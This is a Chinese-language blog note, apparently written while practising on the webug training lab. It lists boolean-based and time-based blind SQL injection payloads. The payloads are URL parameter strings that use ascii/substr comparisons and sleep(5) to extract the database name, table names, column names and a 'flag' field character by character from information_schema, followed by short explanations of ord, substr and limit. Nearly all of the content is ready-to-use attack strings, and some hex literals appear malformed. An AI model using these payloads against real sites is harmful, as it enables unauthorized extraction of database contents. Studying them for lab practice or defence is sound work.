美文网首页sql注入网安_SQL注入
布尔盲注和延时注入笔记

布尔盲注和延时注入笔记

作者: 翻手为云覆手为雨_5e13 | 来源:发表于2019-12-25 09:59 被阅读0次

布尔盲注:

格式:?id=1' and (ascii(substr((爆表列字段的语句 limit 0,1),1,1)))=100 --+

爆库:?id=1' and ord(substr(database(), 1, 1))=115 --+

爆表:?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=100 --+

?id=1' and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374 limit 0,1),1,1)))=100 --+

爆列:?id=1' and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374(库名) and TABLE_NAME=0x61646d696e(表名) limit 0,1),1,1)))=100 --+            limit 0,1),4,1)))=102 含义:第4个的ascii码是102  所以应该是f

爆字段:?id=1' and (ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))=100 --+

延时注入:

格式:?id=1' and if( (ascii(substr(( 爆表列字段语句 limit 0,1),1,1)))=100 ,sleep(5),0)--+

爆库:?id=1' and if(ord(substr(database(),1,1))=115,sleep(5),0) --+

爆表:?id=1' and if( (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374(表名) limit 0,1),1,1)))=100 ,sleep(5),0)--+

爆列:?id=1' and if( (ascii(substr(( select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA="webug" and TABLE_NAME="flag" limit 0,1),1,1)))=105 ,sleep(5),0)--+

select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374(库名) and TABLE_NAME=0x61646d696e(表名)

爆字段:?id=1' and if((ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))<100,sleep(5),0)--+

select group_concat(concat(id,0x20,flag,0x20)) from 库.表

ord:返回字符串首个字符的ASCII值

substr:返回截取的字符串 start必须写,length可以不写,默认到字符串结尾

limit:限制查询结果返回的数量

相关文章

  • 布尔盲注和延时注入笔记

    布尔盲注: 格式:?id=1' and (ascii(substr((爆表列字段的语句 limit 0,1),1,...

  • SQL注入靶场—盲注Rank1-2

    当存在注入点,但服务器没有返回sql执行后的结果回显,就可以使用盲注,盲注分为布尔注入和时间注入。 布尔注入涉及的...

  • Kali Linux系统利用DVWA靶场进测试SQL注入漏洞:

    手工盲注: 手工盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注,手工盲注步骤:1.判断是否存在注入,注入...

  • 01.sqlmap

    1. sqlmap支持五种不同的注入模式: 基于布尔的盲注; 基于时间的盲注; 基于报错注入; 联合查询注入,un...

  • sql注入之盲注

    所谓的盲注即是在sql注入后在前端没有出现报错信息,无法判断是否注入成功。所以需要盲注进行判断 盲注分为基于布尔型...

  • 一步一步学习 Web 安全 2.4 union 联合查询注入

    对 SQL 注入有一个大致的了解后,我们再来深入学习。 SQL 注入有联合查询注入、报错注入、布尔盲注、时间盲注等...

  • SQL注入之布尔盲注

    title: SQL注入之布尔盲注date: 2019-05-25 14:05:48tags:- SQL注入- 布...

  • 三、基于报错型注入和sql盲注的自动化实现

    通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的。这些pa...

  • 利用dnslog进行无回显注入

    原理 在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读...

  • 20200227 SQL注入及杂事

    报错型注入 昨天学了基于时间型和基于布尔型的盲注,今天整个报错型的注入 基本分为: 双查询注入 基于extract...

网友评论

    本文标题:布尔盲注和延时注入笔记

    本文链接:https://www.haomeiwen.com/subject/einqoctx.html